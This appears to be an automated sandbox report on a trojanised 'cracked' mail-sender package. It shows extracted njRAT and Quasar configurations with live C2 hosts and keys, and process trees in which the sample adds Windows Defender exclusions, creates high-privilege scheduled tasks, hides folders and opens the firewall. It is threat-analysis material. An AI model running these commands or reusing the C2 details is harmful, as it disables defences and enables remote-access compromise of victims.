Overview
overview
10Static
static
5Heart-Send...ig.bat
windows7-x64
10Heart-Send...ig.bat
windows10-2004-x64
10Heart-Send...ck.dll
windows7-x64
1Heart-Send...ck.dll
windows10-2004-x64
1Heart-Send...ad.exe
windows7-x64
3Heart-Send...ad.exe
windows10-2004-x64
3Heart-Send...er.exe
windows7-x64
10Heart-Send...er.exe
windows10-2004-x64
10Heart-Send...r1.exe
windows7-x64
10Heart-Send...r1.exe
windows10-2004-x64
10Heart-Send...ye.exe
windows7-x64
10Heart-Send...ye.exe
windows10-2004-x64
10Heart-Send...ck.dll
windows7-x64
1Heart-Send...ck.dll
windows10-2004-x64
1Heart-Send...ad.exe
windows7-x64
3Heart-Send...ad.exe
windows10-2004-x64
3Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2024 12:33
Behavioral task
behavioral1
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Config.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Config.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Heart/HtmlAgilityPack.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Heart/HtmlAgilityPack.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Heart/Load.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Heart/Load.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Loader.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Loader.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Loader1.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Config/Loader1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/HtmlAgilityPack.dll
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/HtmlAgilityPack.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Load.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Load.exe
Resource
win10v2004-20241007-en
General
-
Target
Heart-Sender-V1.2_Cracked_by_JC0der-FireEye/Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe
-
Size
1.1MB
-
MD5
3ab47d7d723c1661807084d39d4b7744
-
SHA1
a8790ce365a8e62d3f38fe2b6fae36b34f7a5a18
-
SHA256
05ecfbb70aa1785e6c8aad3c7da653a797aba2193b7ef136d68e50e23315fbe2
-
SHA512
667c794cbd3bec294a5b6321ec25624a2dc4c44da240ddba7759dceeaca303a34891be85a09bece13bfb8763bfcd6041d08d55e723c2f846a0938bf196cb7d84
-
SSDEEP
24576:xavtvLkLL9IMixoEgeaUOR5UZtqOYq9MmCSSrEH7px:xkjkn9IMHeaU/Z+aPCSbx
Malware Config
Extracted
njrat
0.7d
HacKedTEST
chipo.publicvm.com:1177
4c71585ab01a8f1344352fb1f26b00fd
-
reg_key
4c71585ab01a8f1344352fb1f26b00fd
-
splitter
|'|'|
Extracted
quasar
1.3.0.0
Heart
185.163.127.20:61110
HRT_MUTEX_kecTsVDPnERdvianlr
-
encryption_key
3vnM9JqtaSdxUVqeTXSi
-
install_name
Subfile.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDirr
Signatures
-
Floxif family
-
Njrat family
-
Quasar family
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral12/files/0x0008000000023ba9-133.dat family_quasar behavioral12/memory/3900-137-0x0000000000D50000-0x0000000000DAE000-memory.dmp family_quasar -
Detects Floxif payload 1 IoCs
Processes:
resource yara_rule behavioral12/files/0x000c000000023b27-1.dat floxif -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid Process 2792 powershell.exe 1764 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 3548 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule behavioral12/files/0x000c000000023b27-1.dat acprotect -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exewscript.exetest404.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation test404.exe -
Drops startup file 2 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test404.exe Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test404.exe Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe -
Executes dropped EXE 5 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exetest404.exeGoogle Chrome.exeSys32.exeSubfile.exepid Process 3548 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 4580 test404.exe 4424 Google Chrome.exe 5100 Sys32.exe 3900 Subfile.exe -
Loads dropped DLL 8 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exeLoader.exeLoader1.exeGoogle Chrome.exenetsh.exeSubfile.exepid Process 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 4516 Loader.exe 1364 Loader1.exe 4424 Google Chrome.exe 3548 netsh.exe 3900 Subfile.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Google Chrome.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4c71585ab01a8f1344352fb1f26b00fd = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Google Chrome.exe\" .." Google Chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\4c71585ab01a8f1344352fb1f26b00fd = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Google Chrome.exe\" .." Google Chrome.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exedescription ioc Process File opened (read-only) \??\e: Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 44 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral12/files/0x000a000000023b8a-20.dat autoit_exe behavioral12/memory/4804-61-0x00000000008E0000-0x00000000009E5000-memory.dmp autoit_exe -
Processes:
resource yara_rule behavioral12/memory/4804-4-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/files/0x000c000000023b27-1.dat upx behavioral12/files/0x000a000000023b8d-22.dat upx behavioral12/memory/3548-23-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral12/files/0x000b000000023b79-34.dat upx behavioral12/memory/3548-40-0x0000000000400000-0x0000000000425000-memory.dmp upx behavioral12/memory/4804-63-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4516-87-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4516-86-0x0000000000400000-0x000000000042A000-memory.dmp upx behavioral12/memory/4516-95-0x0000000000400000-0x000000000042A000-memory.dmp upx behavioral12/memory/4516-96-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/files/0x000b000000023b8a-100.dat upx behavioral12/memory/1364-99-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/1364-97-0x0000000000400000-0x000000000042A000-memory.dmp upx behavioral12/memory/1364-108-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/1364-107-0x0000000000400000-0x000000000042A000-memory.dmp upx behavioral12/memory/4424-121-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/3548-123-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/3548-126-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-127-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-128-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-129-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/3900-136-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-142-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/3900-143-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-144-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-146-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-150-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral12/memory/4424-154-0x0000000010000000-0x0000000010030000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exedescription ioc Process File created C:\Program Files\Common Files\System\symsrv.dll Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Load.exeLoader.exeLoader1.exeGoogle Chrome.exeSubfile.exeHeart-Sender-V1.2 Cracked by JC0der-FireEye.exeHeart-Sender-V1.2 Cracked by JC0der-FireEye.exetest404.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Load.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Google Chrome.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Subfile.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test404.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 4652 schtasks.exe 1728 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Sys32.exepid Process 5100 Sys32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exepowershell.exepowershell.exepid Process 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 2792 powershell.exe 2792 powershell.exe 1764 powershell.exe 1764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exepowershell.exepowershell.exeLoader.exeLoader1.exenetsh.exeSubfile.exedescription pid Process Token: SeDebugPrivilege 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 4516 Loader.exe Token: SeDebugPrivilege 1364 Loader1.exe Token: SeDebugPrivilege 3548 netsh.exe Token: SeDebugPrivilege 3900 Subfile.exe Token: SeDebugPrivilege 3900 Subfile.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Subfile.exepid Process 3900 Subfile.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
Heart-Sender-V1.2 Cracked by JC0der-FireEye.exeHeart-Sender-V1.2 Cracked by JC0der-FireEye.exewscript.execmd.exetest404.exedescription pid Process procid_target PID 4804 wrote to memory of 3548 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 87 PID 4804 wrote to memory of 3548 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 87 PID 4804 wrote to memory of 3548 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 87 PID 3548 wrote to memory of 348 3548 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 89 PID 3548 wrote to memory of 348 3548 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 89 PID 348 wrote to memory of 1772 348 wscript.exe 91 PID 348 wrote to memory of 1772 348 wscript.exe 91 PID 348 wrote to memory of 1772 348 wscript.exe 91 PID 348 wrote to memory of 60 348 wscript.exe 92 PID 348 wrote to memory of 60 348 wscript.exe 92 PID 60 wrote to memory of 2792 60 cmd.exe 94 PID 60 wrote to memory of 2792 60 cmd.exe 94 PID 4804 wrote to memory of 4580 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 95 PID 4804 wrote to memory of 4580 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 95 PID 4804 wrote to memory of 4580 4804 Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe 95 PID 60 wrote to memory of 1764 60 cmd.exe 96 PID 60 wrote to memory of 1764 60 cmd.exe 96 PID 60 wrote to memory of 1728 60 cmd.exe 97 PID 60 wrote to memory of 1728 60 cmd.exe 97 PID 60 wrote to memory of 4652 60 cmd.exe 98 PID 60 wrote to memory of 4652 60 cmd.exe 98 PID 60 wrote to memory of 4596 60 cmd.exe 99 PID 60 wrote to memory of 4596 60 cmd.exe 99 PID 60 wrote to memory of 4516 60 cmd.exe 100 PID 60 wrote to memory of 4516 60 cmd.exe 100 PID 60 wrote to memory of 4516 60 cmd.exe 100 PID 60 wrote to memory of 1364 60 cmd.exe 101 PID 60 wrote to memory of 1364 60 cmd.exe 101 PID 60 wrote to memory of 1364 60 cmd.exe 101 PID 4580 wrote to memory of 4424 4580 test404.exe 106 PID 4580 wrote to memory of 4424 4580 test404.exe 106 PID 4580 wrote to memory of 4424 4580 test404.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe"C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe"1⤵
- Drops startup file
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe"C:\Users\Admin\AppData\Local\Temp/Heart-Sender-V1.2 Cracked by JC0der-FireEye.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\system32\wscript.exe"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A22B.tmp\A22C.tmp\A22D.vbs //Nologo3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Heart\Load.exe"C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Heart\Load.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Config.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users" -force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile0" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe" /RL HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Microsoft\SubDir\Subfile1" /tr "C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe" /RL HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4652
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\SubDirr5⤵
- Views/modifies file attributes
PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader.exeloader.exe -pP@$$W@RD@@5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
C:\Users\Admin\AppData\Local\Temp\Heart-Sender-V1.2_Cracked_by_JC0der-FireEye\Config\Loader1.exeloader1.exe -pP@$$W@RD@@5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\test404.exeC:\Users\Admin\AppData\Local\Temp/test404.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\Google Chrome.exe"C:\Users\Admin\AppData\Local\Temp\Google Chrome.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4424 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Google Chrome.exe" "Google Chrome.exe" ENABLE4⤵
- Modifies Windows Firewall
- Loads dropped DLL
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
-
-
C:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exeC:\Users\Admin\AppData\Roaming\SubDirr\Sys32.exe1⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:5100
-
C:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exeC:\Users\Admin\AppData\Roaming\SubDirr\Subfile.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3900
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD57574cf2c64f35161ab1292e2f532aabf
SHA114ba3fa927a06224dfe587014299e834def4644f
SHA256de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085
SHA5124db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1019KB
MD5cb0de434b038de61b61d60e2d284c2c5
SHA1f4197c2ccaf7c42679c15208945e3536d27eda97
SHA256b5050491771ba6bc4305574127ef774caca08280f64f0cea0a44dd8cfb0ecae3
SHA5122984641dcfa04dedcd4a5c6bfd181da3c6352a9405043f9d6a73b0d84be84d5b61f619f209c7a89dcd7cb7631edbf4a40c5fbd6de006e97e15ea00bfd7e09324
-
Filesize
216KB
MD5a0f5d9448eed029fef6d9944df015832
SHA1560dc39fbdccf26465005baf60648d3e0e41b32a
SHA25602d46c7d93d8be4e82fd29d9452203f86d75476dbfcc952efa63360a260fb242
SHA512c41251267d6c42aa916df9e15304e839b0cb9087c834c9aa2a3b912b91c67ba1804e0a1854c64b14654d9ead03e1ed0e4a4ca3a4fd87616f7ad47c8edcec12d7
-
Filesize
528B
MD5eb6e66649458ab67cd6b1c1119d27cc3
SHA18099e76b7c4c5d593889d3d4bcf709e926d3eaab
SHA25626dfa79be36cbdfcc3850d17dc704c16ef2772a4b561e13f349307571230f0e0
SHA512daacbcd01d8d5555dda47ed08b042b29e203ee7ca6a29252a27bb14f6f742db2c1c58d5b83ce36d8c1fb40fae22ef14c0777cbc1ae0f9d28e8d2bb28c7933c08
-
Filesize
60KB
MD52460a0af6c336e546ecb8d3a3bb6fab7
SHA1de23c0a0c8d5b42eb804a557073e7c9cd1fe8558
SHA2564ef7de2f82d7e76e2b408418c26e86680be7ca75f0406aa9e9f052a9e833ee7f
SHA512b75eef7ec0de1ba74ce7ff378f3307741bb3b7b52d092180947753e620c30edae928f68978ddc2dc23c6ae8e8f884cd64a69a875b23de47ebadfd09483170966
-
Filesize
136KB
MD5554969c9b35041023edc51852ed4b30a
SHA1d2e8f0dc1a68ccc70e2e02fc964ad3fdd7ed871e
SHA2564ebd18478b717d304cc981608c127cd32a7105ceb2196b77143db8d0f6e6c843
SHA512b2a2cd5afb498746ff9b005a56e063b33d082fb324210db009ac62651d909c844e13c27f3c2fbdfc808255ad7ac35502daf605fd14008d70c7dfcb4046532288
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
141KB
MD5943df0dd122ec18e4a64231c3d8cb3f9
SHA15abb3181f354cd5d48726fad840518926f8ff0d7
SHA25648945de236ef7a39cf323719c174300653f9c6d35329512c0b2a29cc3ec9ea91
SHA5121bcc301995f984593f9874ef59f79e00ff91031f3bbb1205ff661576365299ae930e9f83356f6a49ab00cfc233f614302266c6707bba7bf86b5d505f96d71009
-
Filesize
348KB
MD53e5da207d7655d267515b8fd7fe35b8a
SHA185a81b28b919d283c7ae1df1a6c8c45dc0ff756a
SHA256db4b1a7399ad2e1fc3d8e64cb9e870a4b7f36ef629614517942a4b7318c29f42
SHA512f097cfdaa714fe1dfcb360467010597015ba1ff4ca686d340d1775bdeadbe02d4d9ec064d78e20add0c29bd4f06f8ef9ee572f2374031a6313af2f7602c0530d
-
Filesize
7KB
MD54fb7326fe1263d2f0626ee186195b891
SHA1f2ceda16fe3ba9e90e2b17f77879278923fb3fe9
SHA256d4641707fb9daa4f2e4e30f869a968f022f98c1067a9d8a9bd21ab22e56f82f4
SHA512f4191396b94e1517af938a9ca6068686956e99b2bde98ed6dccc14c05ecf016c11a75010c5e911a52524886e9404cb001d68832230b15d455fab514ddd9fce7a